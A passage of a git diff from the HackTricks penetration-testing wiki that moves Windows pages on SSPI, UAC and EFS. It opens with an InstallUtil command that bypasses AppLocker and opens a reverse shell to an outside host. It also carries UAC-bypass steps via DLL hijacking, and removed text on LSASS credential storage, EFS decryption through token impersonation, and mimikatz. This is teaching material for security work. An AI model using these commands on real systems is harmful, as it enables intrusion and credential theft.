c:\temp\psby.exe +``` + +#### Reverse shell: + +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe +``` + +You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). + +## Security Support Provider Interface (SSPI) + +Is the API that can be use to authenticate users. + +The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate. + +### Main SSPs + +* **Kerberos**: The preferred one + * %windir%\Windows\System32\kerberos.dll +* **NTLMv1** and **NTLMv2**: Compatibility reasons + * %windir%\Windows\System32\msv1\_0.dll +* **Digest**: Web servers and LDAP, password in form of a MD5 hash + * %windir%\Windows\System32\Wdigest.dll +* **Schannel**: SSL and TLS + * %windir%\Windows\System32\Schannel.dll +* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) + * %windir%\Windows\System32\lsasrv.dll + +#### The negotiation could offer several methods or only one. + +## UAC - User Account Control + +[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. + +{% content-ref url="uac-user-account-control.md" %} +[uac-user-account-control.md](uac-user-account-control.md) +{% endcontent-ref %} + + + +![](<../../.gitbook/assets/image (9) (1) (2).png>) + +\ +Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Get Access Today: + +{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} + + + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/authentication-credentials-uac-and-efs.md b/windows-hardening/windows-security-controls/uac-user-account-control.md similarity index 77% rename from windows-hardening/authentication-credentials-uac-and-efs.md rename to windows-hardening/windows-security-controls/uac-user-account-control.md index 8c3ec6e71..f2fd38db7 100644 --- a/windows-hardening/authentication-credentials-uac-and-efs.md +++ b/windows-hardening/windows-security-controls/uac-user-account-control.md @@ -1,4 +1,4 @@ -# Authentication, Credentials, UAC and EFS +# UAC - User Account Control
@@ -12,87 +12,21 @@
-![](<../.gitbook/assets/image (9) (1) (2).png>) +![](<../../.gitbook/assets/image (9) (1) (2).png>) Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Security Support Provider Interface (SSPI) - -Is the API that can be use to authenticate users. - -The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate. - -### Main SSPs - -* **Kerberos**: The preferred one - * %windir%\Windows\System32\kerberos.dll -* **NTLMv1** and **NTLMv2**: Compatibility reasons - * %windir%\Windows\System32\msv1\_0.dll -* **Digest**: Web servers and LDAP, password in form of a MD5 hash - * %windir%\Windows\System32\Wdigest.dll -* **Schannel**: SSL and TLS - * %windir%\Windows\System32\Schannel.dll -* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) - * %windir%\Windows\System32\lsasrv.dll - -#### The negotiation could offer several methods or only one. - -## Local Security Authority (LSA) - -The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\ -**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\ -LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user. - -The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords. - -## Credentials Storage - -### Security Accounts Manager (SAM) - -Local credentials are present in this file, the passwords are hashed. - -### LSASS - -We have talk about this. Different credentials are saved in the memory of this process. - -### LSA secrets - -LSA could save in disk some credentials: - -* Password of the computer account of the Active Directory (unreachable domain controller). -* Passwords of the accounts of Windows services -* Passwords for scheduled tasks -* More (password of IIS applications...) - -### NTDS.dit - -It is the database of the Active Directory. It is only present in Domain Controllers. - -### Credential Manager store - -Allows browsers and other Windows applications to save credentials. - - - -![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## UAC [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary. For more info about integrity levels: -{% content-ref url="windows-local-privilege-escalation/integrity-levels.md" %} -[integrity-levels.md](windows-local-privilege-escalation/integrity-levels.md) +{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} +[integrity-levels.md](../windows-local-privilege-escalation/integrity-levels.md) {% endcontent-ref %} When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges. @@ -253,13 +187,13 @@ Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**: -![](<../.gitbook/assets/image (96).png>) +![](<../../.gitbook/assets/image (96).png>) (_explorer.exe_ should works) ### Your own bypass - Basic UAC bypass methodology -If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md). +If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking.md). 1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level). 2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**. @@ -272,33 +206,16 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**). -## EFS (Encrypted File System) -EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System). -Examples of files being decrypted without the user asking for it: -* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). -* Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network. -The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work). +![](<../../.gitbook/assets/image (9) (1) (2).png>) -### Check EFS info +Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Get Access Today: -Check if a **user** has **used** this **service** checking if this path exists:`C:\users\\appdata\roaming\Microsoft\Protect` - -Check **who** has **access** to the file using cipher /c \\ -You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files - -### Decrypting EFS files - -#### Being Authority System - -This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user. - -#### Knowing the users password - -{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} +{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@@ -311,11 +228,3 @@ This way requires the **victim user** to be **running** a **process** inside the * **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}